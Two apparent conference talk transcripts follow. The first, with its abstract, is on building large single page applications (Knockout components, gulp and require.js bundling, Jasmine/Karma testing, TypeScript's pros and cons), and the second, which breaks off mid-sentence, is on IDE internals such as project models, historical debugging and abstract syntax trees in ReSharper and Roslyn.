DevOps as well can think about different bundling strategies and try out them different strategies without affecting your application architecture in any way at all and that's a really powerful and useful feature of this system. Okay right so that's one aspect of an important feature when building a large single page application is thinking about how the content gets delivered to the browser. Another aspect that it would be rather remiss of me not to mention at all is testing. Now how many of you test your JavaScript code? 
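(Before turning to testing, here is a condensed sketch of the build setup just described: a gulpfile that lints, concatenates and minifies, plus the runtime bundles declaration that lets require.js fetch the about-page bundle on demand. Plugin choices, globs and bundle contents are illustrative; the generator's actual files differ in detail, and in the real build the require.js optimizer does the bundling rather than a plain concat.)

```js
// gulpfile.js (sketch)
var gulp = require('gulp'),
    jshint = require('gulp-jshint'),
    concat = require('gulp-concat'),
    uglify = require('gulp-uglify'),
    less = require('gulp-less');

gulp.task('js', function () {
    return gulp.src('src/**/*.js')
        .pipe(jshint())                      // lint every source file
        .pipe(jshint.reporter('default'))
        .pipe(concat('scripts.js'))          // one output file...
        .pipe(uglify())                      // ...minified
        .pipe(gulp.dest('dist'));
});

gulp.task('css', function () {
    return gulp.src('src/css/*.less')
        .pipe(less())                        // compile Less to CSS
        .pipe(concat('css.css'))
        .pipe(gulp.dest('dist'));
});

gulp.task('default', ['js', 'css']);         // run both in parallel
```

On the runtime side, require.js (2.1.10+) is told which modules live inside which bundle file, so navigating to the about page triggers exactly one request for about-stuff.js:

```js
require.config({
    bundles: {
        'about-stuff': ['text!components/about-page/about.html']  // contents are illustrative
    }
});
```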
Alright so that's a lot less of you than write JavaScript code and I can understand that that's something I can definitely relate to because if you're working on a relatively small project testing JavaScript is an enormous overhead and is it really giving you the value that you need on a small project arguably not I mean what's the worst that could happen anyway I mean does it even matter anyway on a large project you don't actually have a choice because you will fail if you don't have decent tests for your large single page application and there are lots of different ways that you can do it. There are so many different choices for example you can do traditional unit level testing on your classes with mox you can test at a component level if you want to maybe you're still using mox at that level or maybe you're letting them use real services or you can even test the entire application all at once with a browser automation tool like Selenium or something like that. Now I will not say to you that any one of these things is the right way or that you should do more of one than another or anything like that because honestly I think it depends on the type of application you're building and where the value of your application is where is the business logic does it only make sense at an end to end level does it make sense on an individual class level that's up to you to decide. The only strong opinion that I'm going to give to you is please be selective about what types of tests you write probably the only wrong strategy is to just go let's test all the things in always possible because that's going to cost you a lot if anybody says you should just write every possible test of everything then you should probably punch that person and well I mean I am not a lawyer but legally I think you would be okay doing that I mean I haven't consulted a lawyer it's just my guess because yeah exactly because it's such a dumb opinion it's not going to cost you heavily to do that be selective about what you write tests for and make it match the places where your application has value. Now I cannot tell you that there's only one right way of doing testing but I can show you some examples of testing technologies. So this scaffolding system that I used here that sets up some tests with Jasmine and Karma. Now the notion of best practices in front end world has a half life of about three months so by the time anyone watches the recording of this it might have changed but as of today Jasmine and Karma are very much considered to be best of breed testing technologies so that's what this is going to use. So let me show you a little bit of how this works right now. We've got this test folder and inside the test folder we've got Bower modules to do with testing like Jasmine and we've also got some stuff to do with running the tests and then we've also got a sample test for the homepage component. It's very trivial let me show you what it does right now. So what it does right now is it uses Required.js to pull in the object that it wants to actually test then for this example test it creates an instance of homepage view model and it checks that the initial message is some value then it changes the object and it checks that the message changes in some way. So this is obviously trivial and a good quality valuable test would be exercising some kind of business logic which this does not but this demonstrates the testing technology and that's as far as we're going to get in this talk. 
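Roughly the shape of that scaffolded spec, assuming for simplicity that the module exports the view model constructor directly (the generated component module may wrap it differently), and with illustrative module path, property and method names:

```js
define(['components/home-page/home'], function (HomeViewModel) {

    describe('Home page view model', function () {

        it('has an initial message', function () {
            var vm = new HomeViewModel();
            expect(vm.message()).toContain('Welcome');
        });

        it('changes the message when doSomething is invoked', function () {
            var vm = new HomeViewModel();
            var before = vm.message();
            vm.doSomething();
            expect(vm.message()).not.toBe(before);
        });
    });
});
```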
So let's have a go at running this test shall we. You can run it in various different ways but the first way I'll show you is running it in a browser so I'm just going to open the Synglex HTML page in a browser and when that pops up you'll see here's my test running through the Jasmine browser test runner. You won't always want to run your tests in a browser but it's really good to be able to do so because of course you've got your debugger built into the browser there and that is absolutely invaluable when understanding why your tests are not passing or even worse why they are passing when they shouldn't be. So you will use the debugger very slowly to solve that problem but you don't always want to be working in a browser it can be very convenient to run your tests from the command line and that is where Karma comes in. Many of you use Karma, smallish number we're talking 5 maybe 10% at the most there. Alright so not many people are using this yet but it's growing in popularity and with good reason because it's really good. It's a great tool if you are into your single page applications. It's a command line test runner and so the idea is you run it on the command line it opens up real browser instances like actual instances of Chrome or IE or something and then it pushes tests into them and uses web sockets to pull the results out of them so it can get the tests and the results very very fast and give you really great continuous feedback as you're coding and of course being command line driven is very easy to factor into any sort of build or CI process that you've got. Now if you want to run this you need to define a Karma configuration and that's what has been declared, that's what's been scaffolded out for us by this system. Now to be honest with you I'm slightly disappointed with this choice of file name here. If it's me I would have called it Karma Karma Karma Karma configuration which I think it would have been cooler but they apparently didn't think of that so it's rather boringly karma.conf and what that does is it tells Karma where to find everything that you're using and it's a little bit fiddly to set that up because to get Karma to work with Require.js, to work with Jasmine, to work with Knockout components, to work with everything else that you're using simultaneously it's pretty fiddly and it might take you a couple of hours to get that working or it did me at least but thankfully now I've done that that's all there in the scaffolder and you can just use it. So let's have a go at running Karma on the command line. So let's say Karma start and what that will do is it will fire up a browser instance and it's going to start pushing tests into that as much as it needs and if we look back at the command line here you'll see it's executed one of one tests and believe it or not it passed great. Okay so that's good but now I want to show you how it gives you feedback as you're working. So I'm going to move this down to the bottom of the screen here and make it just occupy this little bit of the bottom there and I'm also going to move my VS window a little bit so we can still see that. And now let's write some more tests shall we? And so let's start with it and then because I don't actually have any business logic in this application this is obviously very fake so I'm just going to do a silly arithmetic test but you will understand how you can apply this to exercise your real logic. So let's do it should do arithmetic. Bit cheaty but I know. 
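(For reference before the live demo continues: a Karma configuration for a setup like this might look roughly as follows. The generator's real karma.conf.js contains more wiring to make Jasmine, require.js and the component loader cooperate, and the file patterns below are illustrative. It is started from the command line with `karma start`.)

```js
// karma.conf.js (sketch)
module.exports = function (config) {
    config.set({
        basePath: '',
        frameworks: ['jasmine', 'requirejs'],
        files: [
            // Served but not <script>-included: require.js loads these on demand.
            { pattern: 'src/**/*.js', included: false },
            { pattern: 'src/**/*.html', included: false },
            { pattern: 'test/**/*Spec.js', included: false },
            // The one file Karma includes directly: it configures require.js and starts the run.
            'test/test-main.js'
        ],
        browsers: ['Chrome'],   // real browser instances that Karma pushes tests into
        autoWatch: true,        // re-run affected tests whenever a watched file changes
        singleRun: false
    });
};
```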
So let's declare a function here that our test will run and as soon as I press the save button here I'm going to click now immediately it realized that that test is there and it's going to run it and now we've got two tests executed and they both passed. Well done Karma. Alright let's put an expectation in there. Expect 1 plus 1, 2 equal 3 because I'm a moron. So let's try running that now. I'll press save and then it fails would you believe it? Oh let's review arithmetic. We'll fix that and we save it and it's working. Now the cool thing about this is it's not just watching my test files it's also watching the files that are being tested. So if some developer comes along and looks at this home view model and says oh do something that's not a very descriptive name is it? Let's change that to something else. Let's change it to change the message there. I'm a good programmer I've made the code better. As soon as they press save they'll go no bad programmer don't change that because the view depends on it being called do something so it's great to have that feedback so they're going to go obviously controls add enough times to make it go back and save and then it's going to be passing again and we know that things are good. So I would totally recommend trying out the Karma test runner for you. You can make it so it only runs certain tests and not all of them which you may need to do if you've got a very large test suite and you can't run them all every time you save anything. So that's really good and that's of course all set up for you by this Yeoman package. Now last thing that we have got time to talk about TypeScript. I bet everybody in this room has seen TypeScript before. Is that right? Hands up if you've seen TypeScript. Yeah I bet you all have and I bet most of you have at least tried it out as well. So I'm not actually even going to demonstrate this to you because it would be boring. All I would do is I would run the same scaffolder as before and when it asks me I would say yeah I'd like to use TypeScript please and then all the code would come out in TypeScript and then it would all work exactly the same as before, even the tests except that you have to compile before you run anything obviously. But other than that it would all work the same as before. Now what I think is valuable for me to communicate over the next 10 minutes or something is not the basics of TypeScript but rather what I think the pros and cons of it are. So I've been using TypeScript to build this management portal on a very large project for about a year now and I've got some pretty strong opinions about what's good and bad about it and I'm going to give you my opinions and hopefully that will be useful when you're thinking about whether to use it in a project. And as you will find out these are not marketing opinions. I would not get this sanctioned by marketing but that's okay because I haven't checked it with them. All right so if you haven't seen TypeScript just to refresh your memory it looks like this. So TypeScript is compiled so it needs to know where your files are so you use reference statements like that. Also if you're using AMD modules you can do these special imports and that fetches an AMD module asynchronously into your code there. 
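The two mechanisms just mentioned look roughly like this (the file paths are illustrative):

```ts
/// <reference path="typings/knockout/knockout.d.ts" />

// AMD-style external module import: compiles to a require() call
// and gives the imported module a static type.
import transactionRepository = require('data/transactionRepository');
```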
You can also declare things like modules which are equivalent to namespaces and classes and when this compiles to JavaScript what we'll have here is an object, oh sorry a function called myapp.data.transaction repository and it's a function because of course in JavaScript all functions can act as class constructors so that's what it compiles to. Then we can define things like private properties on there and give them types. We can also define a constructor and the contents of that is of course what's going to go into the body of this function that it gets compiled to. We can do more. We can define things like methods just like you do in C-sharp and the parameters and return type are typed there and TypeScript will of course enforce that type checking at compile time but the types don't exist at all at runtime it's purely an artifact of compilation. JavaScript does not know about your types so they just checked compilation time there and also we can do things like type inference so you see this URL variable there I haven't declared type for it but the TypeScript compiler knows because it goes oh that's clearly going to evaluate as a string here that's going to be a string and then it will do all the type checking with that as a string so that saves you a lot of typing. Then it's also got some nice syntactical improvements like you see we've got a lambda function here just like in C-sharp you've got lambdas with the equals bracket thing and not surprisingly that compiles to a JavaScript function that works as you like and that's nice and then the final cool thing that it does is that of course it's got so much type information going around that the tooling can give you good feedback as you're coding with things like IntelliSense so that refreshes your memory hopefully of what it's like to write some TypeScript code and that leaves me on to this question is it a good thing or is it not a good thing? Now if you had asked me that question six months ago I would have struggled to give you an honest answer without being at risk of being fired because I did not like it one little bit. Oh no it was not nice as far as I was concerned I was having a bad time with TypeScript because I was working on a massive project and every time I typed anything I would have to wait multiple seconds before my characters would appear in Visual Studio and then they would probably have red squigglies on them even if it was perfectly valid code and I would be like what are you doing and I have to close and reopen files and then I would eventually try and compile my file and then I would immediately open up the Windows Task Manager and I'd look at the memory usage of TypeScript compiler and it would be like 200 megs, 300 megs, 400 megs, 500 megs, 1 gigabyte, 2 gigabytes and my fan in my laptop would be screaming and my fingers would be melting onto the keyboard and I'd be like ah what's going on and eventually it would all finish with this. We're forcibly killing TypeScript compiler and in my team we got so used to running this command that at one point somebody was going to get t-shirts printed with this slogan on it and eventually someone told them that that was a bad idea so they didn't do it but you understand how we felt at that time. But thankfully since then the TypeScript team have released the version 0.9.7 of their tooling. In fact they've gone to 1.0 since then but 0.9.7 is where everything changed. You can still hear me right? It's sounding strange to me. Okay so in 0.97 everything became so much better. 
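(Stepping back for a moment to put the syntax walked through above in one place, following the myapp.data.TransactionRepository example from the talk; the member names are illustrative, and the tooling story continues below.)

```ts
module myapp.data {

    export interface Transaction {
        amount: number;
    }

    // Compiles to a plain JavaScript constructor function: myapp.data.TransactionRepository.
    export class TransactionRepository {

        private cache: Transaction[] = [];          // typed private field

        constructor(private baseUrl: string) { }    // parameter property: becomes a field automatically

        getRecent(count: number): Transaction[] {
            var url = this.baseUrl + '/recent';     // type inferred as string, no annotation needed
            // Lambda syntax, just like C#; compiles to an ordinary function expression.
            return this.cache.filter(t => t.amount > 0).slice(0, count);
        }
    }
}
```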
It didn't eat up gigabytes of RAM anymore, it wasn't crashing Visual Studio, the IntelliSense actually worked reliably, it was a completely different business after 0.9.7 so that was an enormous relief to all of us. So generally speaking you can tell I'm more positive about this now, but I want to still give you the most honest view I can of this. So I would say that if you're using TypeScript on a large project now, sometimes it's bunnies and sunshine and other times it still feels a bit like it's raining blood onto you. So in the spirit of honesty here are the top five best things in my opinion about working with TypeScript and the top five worst things that you still deal with. So let's do the good ones first. The bottom of the list, number five best thing about working with TypeScript is that you can write code in a C sharp kind of object-oriented, typed way. And you probably like that, I mean most people who do it like it, I do anyway, so I'm generally positive about this kind of thing. Number four, typos are very rarely a problem when you're using TypeScript because of course the compiler is going to catch them for you. Very unlikely that you're going to get a typo in production that brings your application down. I appreciate that. Number three, it does have a pretty good syntax, I really like it, it genuinely improves on native JavaScript. So the fact that we can do things like modules and lambdas, I really do appreciate that. So thank you TypeScript team, that's good. Number two, best thing about working with TypeScript, the really big guns now. This is what TypeScript is all about, the fact that you've got strong typing and generics. Now the generics in TypeScript are absolutely gorgeous, it works so well and I really, really appreciate it. So a few weeks ago I was working on some quite complex data structure code with lots of nested generics and it was so great to know that as I refactored it it was going to tell me where I'd forgotten to add an extra generic parameter and so on. So I really, really appreciate that. Number one, best thing of all working with TypeScript, you don't have to remember your own APIs anymore, you can just IntelliSense your way through the entire coding experience and you just don't have to keep remembering stuff. And speaking as someone with limited mental capacity, I really appreciate the fact that I don't have to remember everything all the time. So that's great. Now there are some things that are still not all that lovely and on a bad day I can still feel a bit depressed about it. So number five, not so good thing, well you see I really like JavaScript, I really like how dynamic it is and I like to do some crazy dynamic stuff with all the sort of dynamic function invocation and looking at the arguments array and all that stuff, and you can still do that with TypeScript but the only way you do it is by declaring your variables as type any, which just means don't type check this variable. And so it makes me a little sad that I can't somehow have both the dynamic and strongly typed things together, but I guess that's just a logical limitation, you can't really fix that. But anyway, number four, third-party .d.ts files. If you use any third party JavaScript library, which obviously you do, then TypeScript doesn't know about them. So how does it know what types are in those files? Well you need to give it these type definition files and it's quite easy to find type definition files for any third party library you can think of.
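For context, a type definition file contains only declarations, nothing in it exists at runtime, which is also part of why they so easily drift out of sync with the libraries they describe. A hypothetical excerpt might look something like this:

```typescript
// someLibrary.d.ts (hypothetical) -- describes the shape of a plain JavaScript library to the compiler.
declare module SomeLibrary {
    interface Options {
        timeout?: number;                                              // '?' marks optional members
        retries?: number;
    }
    function configure(options: Options): void;
    function load<T>(url: string, done: (result: T) => void): void;   // generics work in declarations too
}
```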
Now the only problem with them in my experience is that every single one of them is wrong or is at least incomplete or doesn't match the version of the JavaScript library that you're using. So you'll get very used to patching these .d.ts files to correct all the mistakes that the author of them made, and we do that a lot. Okay, number three thing I don't like, very often I'm writing some code and I'm thinking I know this is going to work at runtime, I totally know what I'm doing, and TypeScript is like I don't really know that there's a property with that name, and then you're like, oh damn it, I've got to go and declare these extra types and just give all these extra hints to TypeScript. But you know of course it's fundamentally a necessity. If you want the benefits of strong typing you've got to also pay the price of telling it what the types of things are. And I kind of would like to live in a world that's not even logically consistent where I don't have to do that. But unfortunately that's not possible so you just have to live with that. Okay, number two thing that I don't really like is the VS tooling, like I said it's got way better than it used to be. It used to be a nightmare, it's now actually quite decent most of the time. And probably if you're working on a moderate sized project you will think it's completely flawless and wonderful. But we're working on a massive project and we still get times when it's giving us red squigglies on perfectly valid code, or IntelliSense just won't show for no reason that day. So I'm sure that they will fix whatever the remaining issues are. They will make it perfect, I'm confident, but it's just not 100% of the way there yet. Especially when you compare it to something like the C-Sharp tooling which is just perfect in every way. Now number one, worst thing about working with TypeScript that I don't like, the fact that you're compiling your code at all. I mean if you've spent enough years working with JavaScript and just you save file, reload, save file, reload, the fact that you're compiling stuff all the time and every process that you ever have to create has to involve compilation, it's just a bit annoying. But there are ways of mitigating it. So Visual Studio has got the ability to compile on save individual TypeScript files and you should definitely do that because that will make your life suddenly become good as opposed to really miserable if you were having to rebuild everything every time you touch any file like I did until three weeks ago. So you will make things better for yourself by doing that. So that's my honest opinion. Now if I was to summarize this, would I use TypeScript or not? I think that honestly yes, I would now use it. On a project that gets beyond a few person-months of work, I think that the benefits outweigh the drawbacks. Honestly I do now. That's not to say that there aren't drawbacks. Clearly there are. I just personally think that the benefits now outweigh them, but only on a fairly large project. Now hopefully you can factor that into your own decisions now. Okay, we're coming up to the end now. I've only got a few moments left. So let's just summarize what we've talked about in this talk. Some of it was about knockout, some of it was about general single page application stuff. We talked about difficulties, right?
So with staffing, I would say you can mitigate that by using as much standard front end tooling as you can and align yourself with the rest of the front end world so that you can stay up to date with modern technologies and you can get people to understand what you're working on. Two, architecture. Do something modular. For example, the Knockout component feature, that's going to help you a lot. Come up with something like that. Page weight. Make sure you've got some system for doing the right amount of incremental loading and the right amount of upfront loading. I showed you one way of doing it. You may find some other way but do something like that. Maintenance. There's lots of options there. You could use TypeScript. You should be doing some kind of testing. You might want to do some kind of linting. Just do some stuff. It's going to make your life easier. Library dependencies. Make sure you pull them in from a package manager like Bower and you're not just inventing your own system for organizing libraries and versions. It will be easier for you. Build and test. Use the features that are available. If you're doing TypeScript, do compile on save. If you're using Gulp, look into its ability to stream individual changes as you are working on your code. It's going to make your life better. Performance and memory. I didn't really talk about this but one thing I would recommend is don't do what a certain team that built a large management portal recently did, which is wait until two weeks before you go to production before thinking about memory leaks and then spending two solid weeks day and night in the Chrome debugging tools tracking down memory leaks. Look at them early on. Consider it to be part of your QA process. Just do some basic stuff to look for it from the beginning. Your life will be better. So there we go. Hopefully that will help you in your process of building a large single page application and, you never know, it might even be bunnies and sunshine for you. I hope it is. That's all we've got time for. We do not have time for questions. I'm going to be around. Send me tweets if you want to ask some questions or just tell me what you think about this stuff. Please remember to evaluate your session on the way out and have a really great rest of your day. Thank you very much.
|
These days it's easy to get started building a Single Page Application (SPA). Dozens of frameworks are clamouring to pitch their trivial "hello world" and "todo list" examples. But the moment you step outside the predefined path and begin actually crafting something for a real business, you face an explosion of choices. This talk is about experiences of building large SPAs and maintaining them over time. In part, I'll demonstrate pros and cons of various technology choices, such as TypeScript, Grunt, and AMD module optimisers. In part, I'll demonstrate some Knockout.js-specific techniques, such as the new and powerful "components" feature that improves maintenance, testability, and runtime performance. Throughout, I'll share lessons learned from building and maintaining the core of the Windows Azure management portal, an exceptionally large and high-profile SPA whose various parts are developed by many different teams within Microsoft. I hope these experiences will prove useful when you build your next rich JavaScript application.
|
10.5446/50846 (DOI)
|
Okay, then. Right, so, hello. My name is Matt, and I like IDEs, which is kind of just as well because I work for JetBrains, and JetBrains like IDEs. The talk I want to give today, it kind of started off as like a bit of a state of the union. This is what IDEs do and can do and why they're interesting and what's cool about them and everything. But then I kind of got the idea actually, it's more like a DVD commentary. It's like when you watch a DVD and you have the actor or director giving you a bit of a commentary, a bit of an insight, they stop selling you the movie and actually tell you about the things that they do day to day, give you a bit of a behind the scenes insight, a couple of technical stories and stuff like that. And that's kind of what I want to do today. I want to not have a look at features as such, but have a look at some of the interesting things that IDEs do. It's very easy to use them day in, day out and then forget about what it is that's actually happening under the covers, and frankly it's quite funny. It's nice and geeky and interesting. So first of all, before we go any further, I'm not going to go into the IDE versus text editors debate. That's just going to get messy. It's a religious subject and frankly we're a big enough world. It's all nice and inclusive and friendly enough that you can use whatever tool you like. That's absolutely fine. I mean, some of my best friends use text editors, it's just no problem. So what have IDEs ever done for us? Well, first of all, the key word is integrated: an integrated development environment. This doesn't mean that it's a single window, single application or big monolithic executable. It just means really that all your tools necessary to do your work are within arm's reach. You can do everything you need to do in order to build your project without having to context switch too much. So it's more about reducing your context switching. But the key things that you need to actually build up an IDE, you need a project model. You need a build system, debugger, test runner, visual designers, diagrams, source control integration, very important for an IDE, navigation as well so you can get around your project. It's all well and good. Database tools, okay, fine. Of course, an editor. There's a lot that goes into an IDE. I'm not going to be talking about it all. That's way too crazy. I'm going to look instead at a couple of the core things that are really the central parts of how you build an IDE and what goes into it. So we're going to start with the project model. This to me is the key difference between a text editor and an IDE. Text editors work with files, IDEs work with projects. It's not a hard and fast rule. Obviously, text editors can have project systems and they can work with multiple files, no problem. Everything doesn't necessarily work the other way. IDEs make pretty lousy, simple text editors. A project gives an IDE scope. It's really important. You are no longer editing a single file in isolation. The IDE now knows that if you're referencing something which is defined in another file, it knows where to go and look for that reference. If it's an external reference in an assembly or an external library, it can go and pick that up. It knows where to go to look for that because the project model gives it that information. Usually, this is closely tied to the build system. Visual Studio is a great example of this. Its project model is effectively MSBuild, which is the build system.
You can execute that outside of Visual Studio to build your project. The IDE takes all the information from that build system and exposes it in the UI. We've got the targets, well-known targets. Again, MSBuild has build, rebuild and clean. Those targets are mapped directly to the UI commands of the same name. You can get different types of build system as well. You can have an XML declarative system which is all well and good. It means you can examine the file. You can easily pull out a list of files that are part of that build system, that project model, and display those directly in your IDE. Alternatively, you can have something which is more code-based, more DSL, something like grunt or rake which requires execution before you can actually get that information. The IDE has to cope with both of those. The key thing I want to say really is that project gives the IDE scope. As far as we're going to go with that, we're going to move straight on to debugging. This is also a huge topic which we're not going to dive into. You could do a whole session. You could probably do several sessions about debugging and how an IDE implements debugging. Generally, it's a big topic really. If I was going to pull a couple of things out here, I'd look at expression evaluation. That's quite an interesting one because that's where the debugger, well, that's where you try and evaluate an expression, such as, it could be as simple as A plus B or it could be a Boolean expression. It could be calling functions. But what the debugger here has to do is evaluate the expression. It has to parse that expression, build an abstract syntax tree, walk that tree, evaluate every node along the way, and apply operations to them as it goes. It's quite a big task in and of itself. Interestingly, Visual Studio has problems with lambdas on this. There's a couple of really good blog posts by Microsoft's Jared Parsons explaining why this doesn't work. Some of it is down to architectural Visual Studio COM reasons. But also there's the fundamental reason that a lambda expression is actually syntactic sugar for a class. In order to be able to evaluate a lambda, especially one which you've just entered in arbitrarily, the expression evaluator now suddenly has to change the code which is running in the process. And it has to build a class, emit all the IL for it, and then call it from the expression evaluator, all of which makes it incredibly difficult to actually implement. Symbols are another one, especially remote symbols. That's a very nice, useful feature. You can then, if you are debugging an application, and you want to step into an assembly which you don't have any debugging information for, the debugger can go and talk to a remote server and say, do you have any symbols for this? And it can download the PDB on demand. And then given that information of all the symbols that are there, it can then say, do you have the source files for it? And it can download the source files on demand, which is also very cool. This is supported with Microsoft's reference source stuff. It's all supported in NuGet. And if you're publishing any NuGet packages, it's really cool if you can actually also publish the symbols, symbolsource.org is a great resource for this. Or you can do something with a decompiler. So, for example, dotPeek can act as a source server and a symbol server.
So, it will decompile something on the fly, generate a PDB, return it back to you, and then also decompile the source files on the fly and return those back so you can step through code which you don't even have the source for. It's all very cool stuff. Historical debugging is something else which is rather interesting and is taking shape right now. This is something which combines both profiling and debugging. So, as the application is being debugged, there are profiling events being generated. All of these are collected and stored and analyzed. And then it can be replayed after the fact. They can be used to see what led up to an occurrence happening. So, you can do debugging. You can sort of step back after the fact and see what values you had previous to something going wrong. And some good examples of this are IntelliTrace for .NET, Chronon for Java, and there's spy-js. And let's, so we'll have a quick look at this here. So, I've got a very simple IntelliJ solution here. It doesn't actually do anything. All I'm doing is down at the bottom here, I'm running spy-js. Spy-js runs as a proxy server. And so, every time you go to the website, it can, it'll proxy it and it'll inject its own code and instrument the JavaScript for you. So, if we just go, let's pop back out of that. So, if we go to a website such as StackOverflow, we can hopefully refresh that and we can see down here now, we're getting all of our events coming through. And this is all the events that have happened on load. And we get to see things like the content loaded and we get to see the call stack of what happened when these events happened. And we can dive into those and see what's happening. Over on the other side of the screen, we get to see the values of the variables that were applicable at the time there. So, it's captured not only the event, but the call stack and the context of the code at that point. We can even double click on the, double click on the event to give us the, I've lost it, where's it going? There we go. To give us the source that was executing at the time. And so it gives you a whole lot of information in order to be able to debug. I can go backwards and forwards in time. So, I can go back to my blur event and see the function that happened there and I can go back down to my content loaded event and look at the code that was executing at that point. All very fun and interesting stuff. That's enough about debugging. We get to the fun stuff. This is the bit which I really enjoy. This is the bit which is the fun geeky kind of thing. It's all about the editor. This is where we get the information to make the IDE really rich. And the way we do that is with abstract syntax trees. So, quick show of hands. Everyone know what an abstract syntax tree is? More or less. So, that's, an abstract syntax tree is a way of representing your file as though it's just been parsed. It's been parsed down into all these constituent parts and represented as a tree. A good example would be... So, let's have a look at this. Font big enough? Yeah. Right. So, this is Roslyn. This is Microsoft's new compiler and language services parsing a CS file. We've got just a simple web application. It's looking at the home controller and on the right here, we're in the middle of the screen, we've got this syntax visualizer. We can see a tree which represents the whole of the file. At the very top, the very root, we have a node which represents the file itself.
And then we have various nodes which represent a using statement, some other using statements. And so on, we can see it highlighted on the left there. And we can then drill in. We've got namespace declaration. And we can dive into the class declaration. And then we can dive down into that to the method declaration, identifier name, the actual token, and then even the white space that is there. So, the syntax tree is a way of collecting all the information of a file. It's parsing a file, it's breaking it down into something which you can iterate over. You can look at, you can examine, you can then see, you can reason about. But that's all well and good for one language; where it gets fun is when you have more than one language. So, if we switch over to another project, we've got a razor file. A razor file is a syntax side, sorry, a server side web page which combines HTML, JavaScript, CSS, and C sharp. So, it's got little blocks of C sharp. So, all of these sort of islands here beginning with the at sign, they're actual C sharp files, sorry, C sharp statements. Everything else then is text that's going to be output as part of the request. So, the way this file works when a request is made is it gets compiled into a standard C sharp class with just a whole bunch of response dot writes for all of the text in there which is HTML. And at the end of the day, it just gets called, it writes all the file out and you get to see nice HTML. If we look on the right here in this PSI browser window, this is ReSharper's view of the file. We've actually got several files in one go. We've got a razor file at the top here. We've got a C sharp file, a CSS file, and a JavaScript file. So, what we've done is we built four abstract syntax trees for this one file. The razor file is the main file here. So, we've got our model declaration at the top here which is this. We've got a node which represents that and we can dive into that. We've also got a code block. So, this block here is a block of C sharp. And if we have a look at the razor block here, we've got a bunch of tokens and we've got a bunch of code tokens. So, this tree doesn't actually know about the C sharp. It doesn't understand the C sharp. It doesn't know what it is. But we still want to be able to reason about that and know what it is that is going on. So, what we can do is look at the C sharp tree. Now, what we've got here is we've got a using list, a namespace declaration. I'll just make that a bit tiny. We've got a namespace declaration, namespace body, a class, attributes, modifiers. There's a whole bunch of stuff there that we don't actually see in that file. What ReSharper has done is it's created a code behind file. It's not the same as a code behind file for an ASPX page. It's just an in memory representation. What we do when building this file, when parsing this file, is we generate the same file that will be generated when the razor file itself is compiled. And that then gives us our context to know what to do for IntelliSense and code completion and parsing that. So, this now represents our syntax tree. So, there's our namespace declaration. We've got a namespace body. We've got our class, which gets defined there. And now we've got these sections here. These sections are our C sharp islands. So, you can see this view bag title, maps to this view bag title here.
So, what we've done is we've created a code behind C sharp file, which we can parse and generate an abstract syntax tree for, and then we overlay that on top of our razor file. So, when we want to edit our razor file and display code completion or syntax highlighting, we just map between the two. If I click here and do code completion, we map down into the code behind file and we see what's available there and we just display what would normally be displayed in that C sharp file if we were actually working with the C sharp file. So, what's so cool about having an abstract syntax tree? What does it give us? Why is it, what's the point? The first thing really is that given that deep knowledge of the syntax, it makes it a whole lot easier to do things like syntax highlighting. If you want to highlight all the keywords in a file, then you just look through your syntax tree and find all the keyword nodes. Just change them to be a different color. Outlining is also very easy now because you know where your code blocks begin and end because they're just nodes in the tree. Same with brace matching. You can do things like expand and reduce the selection, which would be something like, if you select a word, you can then expand it and keep on expanding it there to incorporate various code blocks. You know that again because those are just nodes in the tree. You just walk up the tree to get at it. You can do things like contextual text snippets. So, if you have a text snippet to create a new class, you don't want to do that in the middle of a method. So, you only say that this particular code snippet is applicable within a namespace, not within a method body. And you can do other things as well, such as test identification. If you're looking for things like unit tests, you can just go through a class declaration, find all the method declarations, see if they've got any attributes. If the attribute is test, then it's a test. And you can flag that up and report it to your test runner. On top of that, though, we can build more information. We can build semantic information. This is where it starts to get more interesting. So, the syntax tree gives us the raw syntax of the file, but it doesn't give us too much more. Semantic knowledge tells us what's available, what's used, and what these things are. It knows that this is a class, this is a method, and it builds caches, and it implements all the things that we need to work with that. So, from this, we can build code completion. We can build navigation. If it's go to method, we've got the method declaration which we can go to. There's also control flow analysis. This is where you can walk through the syntax tree to see whether you've got if statements, what happens with the branch, whether you've got any throws or exceptions being raised, and that will then stop execution further on. So, you can do dead code analysis with this. It also allows you to do issue analysis. So, it's now easy to walk the syntax tree, look at the semantic information, and highlight stuff to show if it's wrong or inappropriate or you want it to be a different pattern. For example, if you've got asynchronous methods, if you've got an async method which doesn't end with Async, then it's easy enough to flag that as an issue. But one of the nice things you can do is have references. References are really cool because they allow us to do lots of fun things like navigation, code completion.
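The demos in this talk use Roslyn and ReSharper, but to keep the code samples in one language, here is the same walk-the-tree idea sketched with the TypeScript compiler API. The source text and the naming rule are invented, and this only illustrates the shape of the traversal, not what the speaker is demonstrating:

```typescript
import * as ts from "typescript";

const source = `
class ReportService {
    async load(id: number) { return id; }      // async, but not named '...Async'
    async saveAsync(data: any) { }
}`;

// Parse the text into an abstract syntax tree.
const file = ts.createSourceFile("sample.ts", source, ts.ScriptTarget.Latest, /*setParentNodes*/ true);

// Walk every node, flagging async methods whose names don't end in 'Async',
// the same shape of analysis as the issue detection described above.
function visit(node: ts.Node): void {
    if (ts.isMethodDeclaration(node) && ts.isIdentifier(node.name)) {
        const isAsync = node.modifiers?.some(m => m.kind === ts.SyntaxKind.AsyncKeyword);
        if (isAsync && !node.name.text.endsWith("Async")) {
            console.log(`issue: async method '${node.name.text}' should end with 'Async'`);
        }
    }
    ts.forEachChild(node, visit);               // recurse into child nodes
}
visit(file);
```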
So, here I am on the view method here, and I can just do a navigation, and it'll take me off to the implementation of the view. The way it can do this is by following a reference. If we go back to our syntax tree view and we look in our class body method declaration for the first method, into the method body, finally we get to the return statement, we have an invocation expression. This is us calling a method. We can see down here we've got a reference. We've got a reference called view, and we can see that it's a reference to a particular method here. Navigation now is very easy because we just follow the reference. If the reference doesn't resolve, then it gets highlighted in red, which you should be able to see. But we now have automatic checking for errors in your code because the reference isn't valid. You can also do code completion because if we know there's going to be a reference there, we can ask the reference provider to say, what are the candidates? If you're going to resolve this, what are the potential targets you can resolve to? And that then is an easy way of getting code completion. We can take it a little bit further as well and not just have references on method invocations, but on any node in the tree. So since it's just a reference from one node to another node, we can have a reference on the argument. So if we go into our argument list, we can find our... It's just crashed. One moment. It's an internal tool. You might be able to tell. But what you can do is you can have a reference from one node to another node. So it can be any node in the tree. It can be a reference to pretty much anything. And this allows us to do cross-language references. So we can have it... Come on. We can have it... Why is this not working? Okay. So we can have it so there's a reference from a string literal. So the index in the example there, which then references a particular file rather than anything else. We can have it so the reference resolves to index.cshtml rather than a property or a field or something called index. And then, as I say, this allows us to do cross-language references. And the really cool thing we can do with references then as well is that because we've got a 